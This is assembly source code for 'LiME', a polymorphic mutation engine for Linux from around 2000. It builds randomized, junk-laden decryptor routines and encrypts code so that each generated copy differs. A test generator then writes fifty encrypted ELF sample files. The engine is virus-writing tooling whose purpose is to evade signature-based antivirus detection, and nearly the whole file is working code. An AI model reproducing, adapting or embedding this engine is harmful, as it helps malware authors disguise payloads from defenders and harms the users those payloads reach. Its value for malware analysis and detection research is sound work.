
; ***************************************************************
;  To compile LiME under Linux with NASM... Just type:
;  nasm -f elf lime-gen.s
;  ld lime-gen.o -e main -o lime-gen
; ***************************************************************

section .data
global main

; ***************************************************************
;  [LiME] v0.1.2 (BETA version)           Last update:2001/01/23
;  Written by zhugejin at Taipei, Taiwan.        Date:2000/10/10
;  E-mail: zhugejin.bbs@bbs.nhctc.edu.tw (Golden Cicada)

;  Linux Mutation Engine (source code)
; ***************************************************************

LIME_BEGIN:
;	dd LIME_SIZE            ; *test*

para_eax dd 0   ; parameters of LiME
para_ebx dd 0   ; address of buffer for new decryptor
para_ecx dd 0   ; begin of code to be decrypted
para_edx dd 0   ; size of code to be decrypted
para_ebp dd 0   ; displacement of decryptor

disp_reg db 0
lime_rnd_val dd 0
lime_jxx_addr dd 0
        
lime_enc_opcod_tab db 10101000b,02h    ; sub/add
                   db 10000000b,2ah    ; add/sub
                   db 10110000b,32h    ; xor/xor
                   db 10110000b,32h    ; xor/xor

lime_set_reg0_opcod_tab db 29h,11000000b        ; sub reg,reg
                        db 2bh,11000000b        ; sub reg,reg
                        db 31h,11000000b        ; xor reg,reg
                        db 33h,11000000b        ; xor reg,reg
lime_init_reg_opcod_tab db 81h,11000000b        ; add reg,xxxxxxxx
                        db 81h,11001000b        ; or reg,xxxxxxxx
                        db 81h,11110000b        ; xor reg,xxxxxxxx                          
                        db 81h,11000000b        ; add reg,xxxxxxxx

lime_mmx_opcod_tab db 0fch,0fdh,0feh,0ech,0edh,0f8h,0f9h,0fah,0e8h,0e9h
                   db 74h, 75h, 76h, 64h, 65h, 66h

@       equ $   

lime_mk_mov_cod_addr dd lime_mmc1,lime_mmc2     
lime_mk_inc_cod_addr dd lime_mic1,lime_mic2
lime_mk_jxx_cod_addr dd lime_mjc1,lime_mjc2     
lime_mk_tsh_cod_addr dd lime_mtc1,lime_mtc2,lime_mtc3,lime_mtc4
                     dd lime_mtc5,lime_mtc6,lime_mtc7,lime_mtc8

fadr    times 16 dd 0
adr_ndx dd 0
adr_0   dd 0,0,0,0,0,0,0
adr_1   dd 0,0,0,0,0,0,0
adr_2   dd 0,0,0,0,0,0,0
adr_3   dd 0,0,0,0,0,0,0

; ---------------------------------------------------------------

LIME:
        pushf
        cld
        
        mov edi,ebx
        
        push eax
        push ebx
        push ecx
        push edx
        push ebp
        call lime_reloc
lime_reloc:
        pop ebp
        sub ebp,lime_reloc-@
        pop dword [ebp-@+para_ebp]
        pop dword [ebp-@+para_edx]
        pop dword [ebp-@+para_ecx]
        pop dword [ebp-@+para_ebx]
        pop dword [ebp-@+para_eax]
        
        call lime_front_decrypt         ;
        
        call lime_rnd
        and eax,byte 3
        mov [ebp-@+adr_ndx],eax
        xchg ecx,eax
        inc ecx
        lea esi,[ebp-@+adr_0]
next_decrypt:   
        call lime_set_disp_reg
        call lime_decrypt               ;
        loop next_decrypt
        
        call lime_encrypt               ;
        
        mov ecx,[ebp-@+para_ebx]
        mov edx,edi
        sub edx,ecx
                
        popf
        ret
        
; ---------------------------------------------------------------

lime_front_decrypt:
        call lime_make_tsh_cod
        lea esi,[ebp-@+fadr]
        mov ecx,8
next_front_decrypt:     
        call lime_make_tsh_cod
        call lime_set_disp_reg
        
        call lime_make_mov_cod
        call lime_save_eax      ; v0
        stosd
        
        call lime_make_tsh_cod
                
        mov al,81h              ; (add/sub/xor) dword [reg+xxxxxxxx],xxxxxxxx
        stosb
        push esi
        mov al,03h
        lea esi,[ebp-@+lime_enc_opcod_tab]
        call lime_rnd_esi
        lodsb
        pop esi
        or al,[ebp-@+disp_reg]
        stosb
        call lime_save_eax      ; v1
        call lime_rnd
        stosd
        call lime_rnd
        stosd
        
        call lime_make_tsh_cod
        loop next_front_decrypt
        call lime_make_tsh_cod
        ret     
        
lime_decrypt:
        push ecx
        call lime_make_tsh_cod
        
        call lime_make_mov_cod
        call lime_save_eax      ; a0
        stosd
        
        call lime_make_tsh_cod
        call lime_save_eax      ; a1
        call lime_make_tsh_cod

        call lime_rnd
        and al,02h
        or al,80h               ; (add/sub/xor) byte [reg+xxxxxxxx],xx
        stosb
        push esi
        mov al,03h
        lea esi,[ebp-@+lime_enc_opcod_tab]
        call lime_rnd_esi
        lodsd
        pop esi
        mov [esi],eax           ; a2
        add esi,byte 4          ;
        or al,[ebp-@+disp_reg]
        stosb
        call lime_save_eax      ; a3
        call lime_rnd
        stosd
        call lime_rnd
        stosb
        
        call lime_make_tsh_cod
        call lime_make_inc_cod
        call lime_make_tsh_cod
        
        mov ax,0f881h           ; cmp reg,xxxxxxxx
        or ah,[ebp-@+disp_reg]
        stosw
        call lime_save_eax      ; a4
        stosd
        
        or byte [ebp-@+para_eax],10000000b
        call lime_make_tsh_cod
        and byte [ebp-@+para_eax],01111111b
        
        call lime_make_jz_cod
        call lime_save_eax      ; a5
        
        call lime_make_tsh_cod
        
        mov al,0e9h             ; jmp xxxxxxxx
        stosb
        mov eax,[esi-5*4]       ; address of loop
        sub eax,edi
        dec eax
        cmp al,80h              ; jmp xx
        ja mk_short_jmp
        sub eax,byte 3
        stosd
        jmp mk_jmp_end
mk_short_jmp:
        mov byte [edi-01h],0ebh
        stosb
mk_jmp_end:     
        
        call lime_rnd
        and eax,byte 0fh
        add edi,eax                     ; *test*
        call lime_save_eax      ; a6
        
        push esi
        mov esi,[esi-4*2]       ; address of jz xx
        mov eax,edi
        sub eax,esi
        cmp byte [esi-02h],74h
        jz mk_jz_a
        sub esi,byte 3
mk_jz_a:        
        mov [esi-01h],al
        pop esi
        
        pop ecx
        ret
        
lime_encrypt:
        mov ecx,[ebp-@+para_edx]
        mov esi,[ebp-@+para_ecx]
        repz movsb

        push edi
calc_disp:      
        lea esi,[ebp-@+adr_0]
        imul ebx,[ebp-@+adr_ndx],byte 4*7
        lea edx,[esi+ebx]
        mov eax,[edx+4*6]       ;
        mov esi,eax
        sub eax,[ebp-@+para_ebx]
        add eax,[ebp-@+para_ebp]
        mov ecx,[edx+4*3]       ;
        sub eax,[ecx]
        mov bl,[ecx+4]          ; decryptic val
        mov ecx,[edx]
        mov [ecx],eax           ; address of mov reg,xxxxxxxx
        add eax,edi
        sub eax,[edx+4*6]
        mov ecx,[edx+4*4]
        mov [ecx],eax           ; address of cmp reg,xxxxxxxx
        
;       jmp _test1_lime_encrypt         ; *test*
        mov eax,[edx+4*2]       ; decryptic type
        mov [ebp-@+enc_buff],ah
        mov ecx,edi
        sub ecx,esi
        mov edi,esi
encrypt_prog:   
        lodsb
enc_buff db 90h,0c3h            ;
        stosb
        loop encrypt_prog       
_test1_lime_encrypt:

        cmp byte [ebp-@+adr_ndx],0
        jz lime_front_encrypt
        dec byte [ebp-@+adr_ndx]
        jmp calc_disp
        
lime_front_encrypt:     
;       jmp _test2_lime_encrypt         ; *test*
        mov ecx,8
        mov ebx,[ebp-@+adr_0+4*1]       ; address of loop
        lea edi,[ebp-@+fadr]
lfe_next:       
        mov esi,[edi]
        lodsd
        xchg edx,eax
        add edi,byte 4
        mov esi,[edi]
        add edi,byte 4
        call lime_rnd
        and eax,byte 03h
        or eax,byte 04h
        add ebx,eax
        mov eax,ebx
        sub eax,[ebp-@+para_ebx]
        add eax,[ebp-@+para_ebp]
        sub eax,edx
        mov [esi],eax
        mov edx,[esi+04h]
        mov al,[esi-01h]
        and al,00111000b
        jz lfe_sub
        cmp al,00101000b
        jz lfe_add
        xor [ebx],edx
        loop lfe_next
        jmp lime_encrypt_end
lfe_sub:        
        sub [ebx],edx
        loop lfe_next
        jmp lime_encrypt_end
lfe_add:
        add [ebx],edx
        loop lfe_next
_test2_lime_encrypt:
        
lime_encrypt_end:               
        pop edi
        ret
        
; ---------------------------------------------------------------

lime_set_disp_reg:      
        call lime_rnd
        and al,111b
        cmp al,100b
        jz lime_set_disp_reg            
        mov [ebp-@+disp_reg],al
        ret

lime_rnd:
        push edx
        rdtsc
        add eax,[ebp-@+lime_rnd_val]
        add eax,edi
        add eax,edx
        ror eax,1
        not eax
        mov [ebp-@+lime_rnd_val],eax
        pop edx
        ret

lime_rnd_esi:
        mov [ebp-@+lre_a-01h],al
        call lime_rnd
        and eax,byte 3
lre_a:  
        add eax,eax
        add esi,eax
        ret     

lime_save_eax:
        mov [esi],edi   
        add esi,byte 4
        ret
        
lime_rnd_reg:
        mov bl,al
lrr_l:
        call lime_rnd
        test bl,01h
        jnz lrr_w
        and al,11b
lrr_w:
        and al,111b
        cmp al,100b
        jz lrr_l
        cmp al,[ebp-@+disp_reg]
        jz lrr_l
        ret     
        
; ---------------------------------------------------------------

lime_make_mov_cod:
        push esi
        mov al,01h
        lea esi,[ebp-@+lime_mk_mov_cod_addr]
        call lime_rnd_esi
        add esi,eax
        call [esi]
        pop esi
        ret
lime_mmc1:      
        mov al,0b8h             ; mov reg,xxxxxxxx
        or al,[ebp-@+disp_reg]
        stosb
        ret
lime_mmc2:
        mov al,03h
        lea esi,[ebp-@+lime_set_reg0_opcod_tab]
        call lime_rnd_esi
        lodsd
        mov bl,[ebp-@+disp_reg]
        or ah,bl
        rol bl,3
        or ah,bl
        stosw
        call lime_make_tsh_cod
        mov al,03h
        lea esi,[ebp-@+lime_init_reg_opcod_tab]
        call lime_rnd_esi
        lodsd
        or ah,[ebp-@+disp_reg]
        stosw
        ret     
                        
; ---------------------------------------------------------------

lime_make_inc_cod:
        push esi
        mov al,01h
        lea esi,[ebp-@+lime_mk_inc_cod_addr]
        call lime_rnd_esi
        add esi,eax
        call [esi]
        pop esi
        ret
lime_mic1:        
        mov al,40h              ; inc reg
        or al,[ebp-@+disp_reg]
        stosb
        ret
lime_mic2:
        mov eax,1100000011111111b
        or ah,[ebp-@+disp_reg]
        stosw
        ret     
        
; ---------------------------------------------------------------

lime_make_jz_cod:
        push esi
        mov al,01h
        lea esi,[ebp-@+lime_mk_jxx_cod_addr]
        call lime_rnd_esi
        add esi,eax
        call [esi]
        pop esi
        ret
lime_mjc1:
        mov al,74h              ; jz xx
        stosw
        ret
lime_mjc2:
        mov ax,840fh
        stosw
        xor eax,eax
        stosd
        ret

; ---------------------------------------------------------------

lime_make_tsh_cod:
;       ret                             ; *test*
        push ecx
        push esi
        call lime_rnd
        and eax,byte 7
        or eax,byte 2
        mov ecx,eax
lmtc_l:
        lea esi,[ebp-@+lime_mk_tsh_cod_addr]
        call lime_rnd
        and eax,byte 00011100b
        test byte [ebp-@+para_eax],10000000b
        jz lmtc_t1
        and eax,byte 00001100b
lmtc_t1:
        add esi,eax
        call lime_rnd
        call [esi]
        mov esi,[ebp-@+lime_jxx_addr]
        cmp esi,byte 00h
        jz lmtc_t2
        mov eax,edi
        sub eax,esi
        cmp eax,byte 02h
        jbe lmtc_t2
        mov [esi-01h],al
        and dword [ebp-@+lime_jxx_addr],byte 00h
lmtc_t2:        
        loop lmtc_l
        and dword [ebp-@+lime_jxx_addr],byte 00h
        pop esi
        pop ecx
        ret     
        
lime_mtc1:                      ; 8087
        mov al,0d8h
        stosb
lmtc1_a1:       
        call lime_rnd
        mov al,ah
        and ah,00111000b
        cmp ah,00001000b
        jz lmtc1_a1
        cmp ah,00110000b
        jae lmtc1_a1            
        mov ah,al
        and ah,00000111b
        cmp ah,00000101b
        jnz lmtc1_a2
        and al,00111111b
        stosb
        call lime_rnd
        and eax,byte 7fh
        add eax,[ebp-@+para_ebp]
        stosd
        ret
lmtc1_a2:
        or al,11000000b
        stosb
        ret     
        
lime_mtc2:
        ret
        
lime_mtc3:                      ; MMX
        mov al,0fh
        stosb
        lea esi,[ebp-@+lime_mmx_opcod_tab]
        call lime_rnd
        push eax
        and eax,byte 0fh
        add esi,eax
        pop eax
        or ah,11000000b
        lodsb
        stosw
        ret
                 
lime_mtc4:
        and al,01h
        mov dl,al
        shl dl,3
        call lime_rnd_reg
        or al,0b0h              ; mov reg,xxxxxxxx
        or al,dl        
        stosb
        cmp al,0b8h
        jb lmtc4_a
        call lime_rnd
        and eax,0bfff83ffh
        stosd
        ret
lmtc4_a:
        call lime_rnd
        stosb
        ret     
        
lime_mtc5:      
        and al,03h
        or al,80h               ;
        stosb
        call lime_rnd_reg
        or al,11000000b
        stosb
        call lime_rnd
        and eax,83ffbfffh
        stosd
        cmp byte [edi-06h],81h
        jz lime_mtc5_a
        sub edi,byte 3
lime_mtc5_a:    
;       ret
        
lime_mtc6:
        cmp dword [ebp-@+lime_jxx_addr],byte 00h
        jnz lime_mtc4
        call lime_rnd
        and eax,byte 0fh
        or al,70h               ; jxx xx
        stosw
        mov [ebp-@+lime_jxx_addr],edi
        call lime_mtc5
        ret
        
lime_mtc7:
        and al,01h
        or al,0feh              ; (inc/dec) reg
        stosb
        call lime_rnd_reg
        and ah,00001000b
        or al,11000000b
        or al,ah
        stosb
        ret     
        
lime_mtc8:
        mov al,01h
        call lime_rnd_reg
        and ah,00001000b
        or ah,40h               ; (inc/dec) reg
        or al,ah
        stosb
        ret     
        
; ---------------------------------------------------------------

LIME_END:       
LIME_SIZE equ LIME_END-LIME_BEGIN

; ***************************************************************
;  [LiME] test files generator
; ***************************************************************

main:
        mov eax,4
        mov ebx,1
        mov ecx,gen_msg
        mov edx,gen_msg_len
        int 80h
        
        mov ecx,50
gen_l1: 
        push ecx
        
        mov eax,8
        mov ebx,filename        
        mov ecx,000101101101b           ;000r 0xr0 xr0x
        int 80h
        
        push eax
        
        mov eax,0
        mov ebx,host_entry
        mov ecx,host
        mov edx,host_len
        mov ebp,[e_entry]
        call LIME
        
        pop ebx
        
        mov eax,4
        mov ecx,elf_head
        add edx,host_entry-elf_head
        mov [p_filsz],edx
        mov [p_memsz],edx
        int 80h
        
        mov eax,6
        int 80h
        
        lea ebx,[filename+1]
        inc byte [ebx+1]
        cmp byte [ebx+1],'9'
        jbe gen_l2
        inc byte [ebx]
        mov byte [ebx+1],'0'
gen_l2: 
        pop ecx
        loop gen_l1

        mov eax,1
        xor ebx,ebx
        int 80h
        
gen_msg db 'Generates 50 [LiME] encrypted test files...',0dh,0ah
gen_msg_len equ $-gen_msg
filename db 't00',0

host:
        call host_reloc
host_reloc:
        pop ecx
        add ecx,host_msg-host_reloc
        mov eax,4
        mov ebx,1
        mov edx,host_msg_len
        int 80h
        mov eax,1
        xor ebx,ebx
        int 80h

host_msg db 'This is a [LiME] test file!',0dh,0ah
host_msg_len equ $-host_msg
host_len equ $-host

elf_head:
e_ident db 0x7f,'ELF',1,1,1
        times 9 db 0
e_type  dw 2
e_mach  dw 3
e_ver   dd 1
e_entry dd host_entry-elf_head+08048000h
e_phoff dd 34h
e_shoff dd 0
e_flags dd 0
e_elfhs dw 34h
e_phes  dw 20h
e_phec  dw 01h
e_shes  dw 0
e_shec  dw 0
e_shsn  dw 0    
elf_ph:
p_type  dd 1
p_off   dd 0
p_vaddr dd 08048000h
p_paddr dd 08048000h
p_filsz dd file_len
p_memsz dd file_len
p_flags dd 7
p_align dd 1000h
        times 20h db 0
host_entry:
        times 1024*4 db 0

file_len equ $-elf_head

